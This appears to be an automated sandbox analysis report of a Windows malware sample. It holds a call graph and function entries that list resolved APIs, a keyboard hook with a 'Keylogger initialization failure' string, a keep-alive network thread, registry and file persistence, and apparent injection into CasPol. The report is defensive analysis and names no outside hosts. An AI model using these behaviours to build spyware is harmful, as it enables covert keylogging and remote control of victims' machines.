4098ed 47673 401eea 26 API calls 47671->47673 47674 409930 CreateThread 47672->47674 47675 40993c CreateThread 47672->47675 47700 4099a9 47672->47700 47673->47659 47674->47675 47697 409993 47674->47697 47676 401e13 26 API calls 47675->47676 47694 4099b5 47675->47694 47677 409950 47676->47677 47677->47640 47678->47647 47818 40999f 135 API calls 47678->47818 47680 40843d 47679->47680 47681 40845b 47680->47681 47683 402f0d 28 API calls 47680->47683 47681->47655 47683->47681 47686 40b006 47684->47686 47685 4098c3 47685->47659 47685->47660 47686->47685 47689 403b9e 47686->47689 47688->47671 47690 403ba8 47689->47690 47692 403bb3 47690->47692 47693 403cfd 28 API calls 47690->47693 47692->47685 47693->47692 47703 40a3f4 47694->47703 47752 4099e4 47697->47752 47773 409e48 47700->47773 47730 40a402 47703->47730 47704 4099be 47705 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 47706 40b027 28 API calls 47705->47706 47706->47730 47709 41aca0 GetTickCount 47709->47730 47711 40a4a2 GetWindowTextW 47711->47730 47713 401e13 26 API calls 47713->47730 47714 40a5ff 47716 401e13 26 API calls 47714->47716 47715 40affa 28 API calls 47715->47730 47716->47704 47717 40a569 Sleep 47717->47730 47720 401f66 28 API calls 47720->47730 47721 40a4f1 47723 4082dc 28 API calls 47721->47723 47721->47730 47736 40a876 31 API calls ___std_exception_copy 47721->47736 47723->47721 47725 405ce6 28 API calls 47725->47730 47727 4028cf 28 API calls 47727->47730 47728 41ae08 28 API calls 47728->47730 47729 409d58 27 API calls 47729->47730 47730->47704 47730->47705 47730->47709 47730->47711 47730->47713 47730->47714 47730->47715 47730->47717 47730->47720 47730->47721 47730->47725 47730->47727 47730->47728 47730->47729 47731 401eea 26 API calls 47730->47731 47732 433519 5 API calls __Init_thread_wait 47730->47732 47733 4338a5 29 API calls __onexit 47730->47733 47734 4334cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47730->47734 47735 4082a8 28 API calls 47730->47735 47737 40b0dd 28 API calls 47730->47737 47738 40ae58 44 API calls 2 library calls 47730->47738 47739 440c51 47730->47739 47743 404c9e 28 API calls 47730->47743 47731->47730 47732->47730 47733->47730 47734->47730 47735->47730 47736->47721 47737->47730 47738->47730 47740 440c5d 47739->47740 47744 440a4d 47740->47744 47743->47730 47745 440a64 47744->47745 47749 440aa5 47745->47749 47750 445354 20 API calls _Atexit 47745->47750 47747 440a9b 47751 43a827 26 API calls _Deallocate 47747->47751 47749->47730 47750->47747 47751->47749 47753 409a63 GetMessageA 47752->47753 47754 4099ff GetModuleHandleA SetWindowsHookExA 47752->47754 47755 409a75 TranslateMessage DispatchMessageA 47753->47755 47756 40999c 47753->47756 47754->47753 47757 409a1b GetLastError 47754->47757 47755->47753 47755->47756 47767 41ad46 47757->47767 47761 409a3e 47762 401f66 28 API calls 47761->47762 47763 409a4d 47762->47763 47764 41a686 79 API calls 47763->47764 47765 409a52 47764->47765 47766 401eea 26 API calls 47765->47766 47766->47756 47768 440c51 26 API calls 47767->47768 47769 41ad67 47768->47769 47770 401f66 28 API calls 47769->47770 47771 409a31 47770->47771 47772 404c9e 28 API calls 47771->47772 47772->47761 47774 409e5d Sleep 47773->47774 47793 409d97 47774->47793 47776 4099b2 47777 409e9d CreateDirectoryW 47782 409e6f 47777->47782 47778 409eae GetFileAttributesW 47778->47782 47779 401d64 28 API calls 47779->47782 47780 409ec5 SetFileAttributesW 47780->47782 47782->47774 47782->47776 47782->47777 47782->47778 47782->47779 47782->47780 47787 409f10 47782->47787 47806 41b58f 47782->47806 47783 409f3f PathFileExistsW 47783->47787 47785 401f86 28 API calls 47785->47787 47786 40a048 SetFileAttributesW 47786->47782 47787->47783 47787->47785 47787->47786 47788 401eef 26 API calls 47787->47788 47789 406052 28 API calls 47787->47789 47790 401eea 26 API calls 47787->47790 47792 401eea 26 API calls 47787->47792 47815 41b61a 32 API calls 47787->47815 47816 41b687 CreateFileW SetFilePointer WriteFile CloseHandle 47787->47816 47788->47787 47789->47787 47790->47787 47792->47782 47794 409e44 47793->47794 47796 409dad 47793->47796 47794->47782 47795 409dcc CreateFileW 47795->47796 47797 409dda GetFileSize 47795->47797 47796->47795 47798 409e0f CloseHandle 47796->47798 47799 409e21 47796->47799 47800 409e04 Sleep 47796->47800 47801 409dfd 47796->47801 47797->47796 47797->47798 47798->47796 47799->47794 47803 4082dc 28 API calls 47799->47803 47800->47798 47817 40a7f0 83 API calls 47801->47817 47804 409e3d 47803->47804 47805 4098a5 126 API calls 47804->47805 47805->47794 47807 41b5a2 CreateFileW 47806->47807 47809 41b5db 47807->47809 47810 41b5df 47807->47810 47809->47782 47811 41b5f6 WriteFile 47810->47811 47812 41b5e6 SetFilePointer 47810->47812 47813 41b60b CloseHandle 47811->47813 47814 41b609 47811->47814 47812->47811 47812->47813 47813->47809 47814->47813 47815->47787 47816->47787 47817->47800 47820 402d97 47819->47820 47823 4030f7 47820->47823 47822 402dab 47822->47651 47824 403101 47823->47824 47826 403115 47824->47826 47827 4036c2 28 API calls 47824->47827 47826->47822 47827->47826 47829 403b48 47828->47829 47835 403b7a 47829->47835 47832 403cbb 47839 403dc2 47832->47839 47834 403cc9 47834->47309 47836 403b86 47835->47836 47837 403b9e 28 API calls 47836->47837 47838 403b5a 47837->47838 47838->47832 47840 403dce 47839->47840 47843 402ffd 47840->47843 47842 403de3 47842->47834 47844 40300e 47843->47844 47845 4032a4 28 API calls 47844->47845 47846 40301a 47845->47846 47848 40302e 47846->47848 47849 4035e8 28 API calls 47846->47849 47848->47842 47849->47848 47856 4395ba 47850->47856 47854 412814 47853->47854 47855 4127ed RegSetValueExA RegCloseKey 47853->47855 47854->47335 47855->47854 47859 43953b 47856->47859 47858 401608 47858->47333 47860 43954a 47859->47860 47861 43955e 47859->47861 47867 445354 20 API calls _Atexit 47860->47867 47866 43955a __alldvrm 47861->47866 47869 447601 11 API calls 2 library calls 47861->47869 47863 43954f 47868 43a827 26 API calls _Deallocate 47863->47868 47866->47858 47867->47863 47868->47866 47869->47866 47873 41aab9 ctype ___scrt_fastfail 47870->47873 47871 401f66 28 API calls 47872 41ab2e 47871->47872 47872->47339 47873->47871 47874->47355 47876 413fb3 getaddrinfo WSASetLastError 47875->47876 47877 413fa9 47875->47877 47876->47406 48014 413e37 35 API calls ___std_exception_copy 47877->48014 47879 413fae 47879->47876 47881 404206 socket 47880->47881 47882 4041fd 47880->47882 47884 404220 47881->47884 47885 404224 CreateEventW 47881->47885 48015 404262 WSAStartup 47882->48015 47884->47406 47885->47406 47886 404202 47886->47881 47886->47884 47888 4049b1 47887->47888 47889 40492a 47887->47889 47888->47406 47890 404933 47889->47890 47891 404987 CreateEventA CreateThread 47889->47891 47892 404942 GetLocalTime 47889->47892 47890->47891 47891->47888 48017 404b1d 47891->48017 47893 41ad46 28 API calls 47892->47893 47894 40495b 47893->47894 48016 404c9e 28 API calls 47894->48016 47896 404968 47897 401f66 28 API calls 47896->47897 47898 404977 47897->47898 47899 41a686 79 API calls 47898->47899 47900 40497c 47899->47900 47901 401eea 26 API calls 47900->47901 47901->47891 47903 4043e1 47902->47903 47904 4042b3 47902->47904 47905 404343 47903->47905 47906 4043e7 WSAGetLastError 47903->47906 47904->47905 47907 4042e8 47904->47907 47910 404cbf 28 API calls 47904->47910 47905->47406 47906->47905 47908 4043f7 47906->47908 48021 420151 27 API calls 47907->48021 47911 4042f7 47908->47911 47912 4043fc 47908->47912 47914 4042d4 47910->47914 47917 401f66 28 API calls 47911->47917 48026 41bc76 30 API calls 47912->48026 47913 4042f0 47913->47911 47916 404306 47913->47916 47918 401f66 28 API calls 47914->47918 47927 404315 47916->47927 47928 40434c 47916->47928 47921 404448 47917->47921 47922 4042e3 47918->47922 47919 40440b 48027 404c9e 28 API calls 47919->48027 47924 401f66 28 API calls 47921->47924 47925 41a686 79 API calls 47922->47925 47923 404418 47926 401f66 28 API calls 47923->47926 47929 404457 47924->47929 47925->47907 47930 404427 47926->47930 47932 401f66 28 API calls 47927->47932 48023 420f34 56 API calls 47928->48023 47933 41a686 79 API calls 47929->47933 47934 41a686 79 API calls 47930->47934 47936 404324 47932->47936 47933->47905 47937 40442c 47934->47937 47935 404354 47938 404389 47935->47938 47939 404359 47935->47939 47940 401f66 28 API calls 47936->47940 47941 401eea 26 API calls 47937->47941 48025 4202ea 28 API calls 47938->48025 47942 401f66 28 API calls 47939->47942 47943 404333 47940->47943 47941->47905 47946 404368 47942->47946 47947 41a686 79 API calls 47943->47947 47945 404391 47948 4043be CreateEventW CreateEventW 47945->47948 47950 401f66 28 API calls 47945->47950 47949 401f66 28 API calls 47946->47949 47960 404338 47947->47960 47948->47905 47951 404377 47949->47951 47953 4043a7 47950->47953 47954 41a686 79 API calls 47951->47954 47955 401f66 28 API calls 47953->47955 47956 40437c 47954->47956 47957 4043b6 47955->47957 48024 420592 54 API calls 47956->48024 47959 41a686 79 API calls 47957->47959 47961 4043bb 47959->47961 48022 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47960->48022 47961->47948 48028 41a945 GlobalMemoryStatusEx 47962->48028 47964 41a982 47964->47406 48029 413646 47965->48029 47969 40cc0d 47968->47969 47970 41246e 3 API calls 47969->47970 47972 40cc14 47970->47972 47971 40cc2c 47971->47406 47972->47971 47973 4124b7 3 API calls 47972->47973 47973->47971 47975 401f86 28 API calls 47974->47975 47976 41ae03 47975->47976 47976->47406 47978 41aed5 47977->47978 47979 401f86 28 API calls 47978->47979 47980 41aee7 47979->47980 47980->47406 47982 41acb6 GetTickCount 47981->47982 47982->47423 47984 436050 ___scrt_fastfail 47983->47984 47985 41ac71 GetForegroundWindow GetWindowTextW 47984->47985 47986 403b40 28 API calls 47985->47986 47987 41ac9b 47986->47987 47987->47423 47989 401f66 28 API calls 47988->47989 47990 40e69e 47989->47990 47990->47423 47991->47423 47993 4045ec 47992->47993 47994 43a88c ___std_exception_copy 21 API calls 47993->47994 47996 40465b 47993->47996 47997 401f86 28 API calls 47993->47997 47999 401eef 26 API calls 47993->47999 48002 401eea 26 API calls 47993->48002 48062 404688 47993->48062 48073 40455b 59 API calls 47993->48073 47994->47993 47996->47993 47998 404666 47996->47998 47997->47993 48074 4047eb 98 API calls 47998->48074 47999->47993 48001 40466d 48003 401eea 26 API calls 48001->48003 48002->47993 48004 404676 48003->48004 48005 401eea 26 API calls 48004->48005 48006 40467f 48005->48006 48006->47428 48008->47406 48009->47428 48010->47428 48011->47423 48012->47428 48013->47428 48014->47879 48015->47886 48016->47896 48020 404b29 101 API calls 48017->48020 48019 404b26 48020->48019 48021->47913 48022->47905 48023->47935 48024->47960 48025->47945 48026->47919 48027->47923 48028->47964 48032 413619 48029->48032 48033 41362e ___scrt_initialize_default_local_stdio_options 48032->48033 48036 43e2dd 48033->48036 48039 43b030 48036->48039 48040 43b070 48039->48040 48041 43b058 48039->48041 48040->48041 48043 43b078 48040->48043 48056 445354 20 API calls _Atexit 48041->48056 48058 4392de 38 API calls 3 library calls 48043->48058 48044 43b05d 48057 43a827 26 API calls _Deallocate 48044->48057 48047 43b088 48059 43b7b6 20 API calls 2 library calls 48047->48059 48048 433d2c _ValidateLocalCookies 5 API calls 48050 41363c 48048->48050 48050->47406 48051 43b100 48060 43be24 50 API calls 3 library calls 48051->48060 48053 43b10b 48061 43b820 20 API calls _free 48053->48061 48055 43b068 48055->48048 48056->48044 48057->48055 48058->48047 48059->48051 48060->48053 48061->48055 48068 4046a3 48062->48068 48063 4047d8 48064 401eea 26 API calls 48063->48064 48065 4047e1 48064->48065 48065->47996 48066 403b60 28 API calls 48066->48068 48067 401eef 26 API calls 48067->48068 48068->48063 48068->48066 48068->48067 48069 401eea 26 API calls 48068->48069 48070 401ebd 28 API calls 48068->48070 48071 401fbd 28 API calls 48068->48071 48069->48068 48072 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 48070->48072 48071->48068 48072->48068 48075 414b9b 48072->48075 48073->47993 48074->48001 48076 401fbd 28 API calls 48075->48076 48077 414bbd SetEvent 48076->48077 48078 414bd2 48077->48078 48079 403b60 28 API calls 48078->48079 48080 414bec 48079->48080 48081 401fbd 28 API calls 48080->48081 48082 414bfc 48081->48082 48083 401fbd 28 API calls 48082->48083 48084 414c0e 48083->48084 48085 41afc3 28 API calls 48084->48085 48086 414c17 48085->48086 48087 4161f2 48086->48087 48089 414de3 48086->48089 48090 414c37 GetTickCount 48086->48090 48088 401d8c 26 API calls 48087->48088 48091 4161fb 48088->48091 48089->48087 48149 414d99 48089->48149 48092 41ad46 28 API calls 48090->48092 48093 401eea 26 API calls 48091->48093 48094 414c4d 48092->48094 48096 416207 48093->48096 48097 41aca0 GetTickCount 48094->48097 48099 401eea 26 API calls 48096->48099 48100 414c54 48097->48100 48098 414d7d 48098->48087 48102 416213 48099->48102 48101 41ad46 28 API calls 48100->48101 48103 414c5f 48101->48103 48104 41ac52 30 API calls 48103->48104 48105 414c6d 48104->48105 48106 41aec8 28 API calls 48105->48106 48107 414c7b 48106->48107 48108 401d64 28 API calls 48107->48108 48109 414c89 48108->48109 48154 4027ec 28 API calls 48109->48154 48111 414c97 48155 40275c 28 API calls 48111->48155 48113 414ca6 48114 4027cb 28 API calls 48113->48114 48115 414cb5 48114->48115 48156 40275c 28 API calls 48115->48156 48117 414cc4 48118 4027cb 28 API calls 48117->48118 48119 414cd0 48118->48119 48157 40275c 28 API calls 48119->48157 48121 414cda 48158 404468 60 API calls ctype 48121->48158 48123 414ce9 48124 401eea 26 API calls 48123->48124 48125 414cf2 48124->48125 48126 401eea 26 API calls 48125->48126 48127 414cfe 48126->48127 48128 401eea 26 API calls 48127->48128 48129 414d0a 48128->48129 48130 401eea 26 API calls 48129->48130 48131 414d16 48130->48131 48132 401eea 26 API calls 48131->48132 48133 414d22 48132->48133 48134 401eea 26 API calls 48133->48134 48135 414d2e 48134->48135 48136 401e13 26 API calls 48135->48136 48137 414d3a 48136->48137 48138 401eea 26 API calls 48137->48138 48139 414d43 48138->48139 48140 401eea 26 API calls 48139->48140 48141 414d4c 48140->48141 48142 401d64 28 API calls 48141->48142 48143 414d57 48142->48143 48144 43a5e7 _strftime 42 API calls 48143->48144 48145 414d64 48144->48145 48146 414d69 48145->48146 48147 414d8f 48145->48147 48150 414d82 48146->48150 48151 414d77 48146->48151 48148 401d64 28 API calls 48147->48148 48148->48149 48149->48087 48160 404ab1 83 API calls 48149->48160 48153 404915 104 API calls 48150->48153 48159 4049ba 81 API calls 48151->48159 48153->48098 48154->48111 48155->48113 48156->48117 48157->48121 48158->48123 48159->48098 48160->48098 48162->47454 48163->47481 48164->47480 48165->47469 48166->47473 48167->47479 48169 40e56a 48168->48169 48170 4124b7 3 API calls 48169->48170 48172 40e60e 48169->48172 48174 40e5fe Sleep 48169->48174 48190 40e59c 48169->48190 48170->48169 48171 4082dc 28 API calls 48171->48190 48173 4082dc 28 API calls 48172->48173 48176 40e619 48173->48176 48174->48169 48175 41ae08 28 API calls 48175->48190 48178 41ae08 28 API calls 48176->48178 48179 40e625 48178->48179 48203 412774 29 API calls 48179->48203 48182 401e13 26 API calls 48182->48190 48183 40e638 48184 401e13 26 API calls 48183->48184 48186 40e644 48184->48186 48185 401f66 28 API calls 48185->48190 48187 401f66 28 API calls 48186->48187 48188 40e655 48187->48188 48191 4126d2 29 API calls 48188->48191 48189 4126d2 29 API calls 48189->48190 48190->48171 48190->48174 48190->48175 48190->48182 48190->48185 48190->48189 48201 40bf04 73 API calls ___scrt_fastfail 48190->48201 48202 412774 29 API calls 48190->48202 48192 40e668 48191->48192 48204 411699 TerminateProcess WaitForSingleObject 48192->48204 48194 40e670 ExitProcess 48205 411637 61 API calls 48198->48205 48202->48190 48203->48183 48204->48194

                                                                                                            Executed Functions

                                                                                                            Function 0041BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                            • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                            • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                            • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                            • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                                            • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                            • API String ID: 384173800-625181639
                                                                                                            • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                            • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                            • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                            • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
                                                                                                            Function 004099E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1259 4099e4-4099fd 1260 409a63-409a73 GetMessageA 1259->1260 1261 4099ff-409a19 GetModuleHandleA SetWindowsHookExA 1259->1261 1262 409a75-409a8d TranslateMessage DispatchMessageA 1260->1262 1263 409a8f 1260->1263 1261->1260 1264 409a1b-409a61 GetLastError call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1261->1264 1262->1260 1262->1263 1265 409a91-409a96 1263->1265 1264->1265
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                            • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                            • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                            • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                            • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                            Strings
                                                                                                            • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                            • String ID: Keylogger initialization failure: error
                                                                                                            • API String ID: 3219506041-952744263
                                                                                                            • Opcode ID: 04eaad81753b9e27949701049d8d5bd2de999136c2a6d130b4221f81ecb2367e
                                                                                                            • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                                            • Opcode Fuzzy Hash: 04eaad81753b9e27949701049d8d5bd2de999136c2a6d130b4221f81ecb2367e
                                                                                                            • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                                                                            Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                            • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                            • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                            • API String ID: 2281282204-3981147832
                                                                                                            • Opcode ID: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                            • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                            • Opcode Fuzzy Hash: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                            • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                                            Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1419 404915-404924 1420 4049b1 1419->1420 1421 40492a-404931 1419->1421 1422 4049b3-4049b7 1420->1422 1423 404933-404937 1421->1423 1424 404939-404940 1421->1424 1425 404987-4049af CreateEventA CreateThread 1423->1425 1424->1425 1426 404942-404982 GetLocalTime call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1424->1426 1425->1422 1426->1425
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                            Strings
                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$EventLocalThreadTime
                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                            • API String ID: 2532271599-1507639952
                                                                                                            • Opcode ID: ee3ad1be35f4293743414279c88800ade4f2d806fe95fc1c64c02c4606088ff0
                                                                                                            • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                            • Opcode Fuzzy Hash: ee3ad1be35f4293743414279c88800ade4f2d806fe95fc1c64c02c4606088ff0
                                                                                                            • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                            Function 0043293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                                            • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 1815803762-0
                                                                                                            • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                            • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                            • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                            • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                            Function 0041A7A2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                                            • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
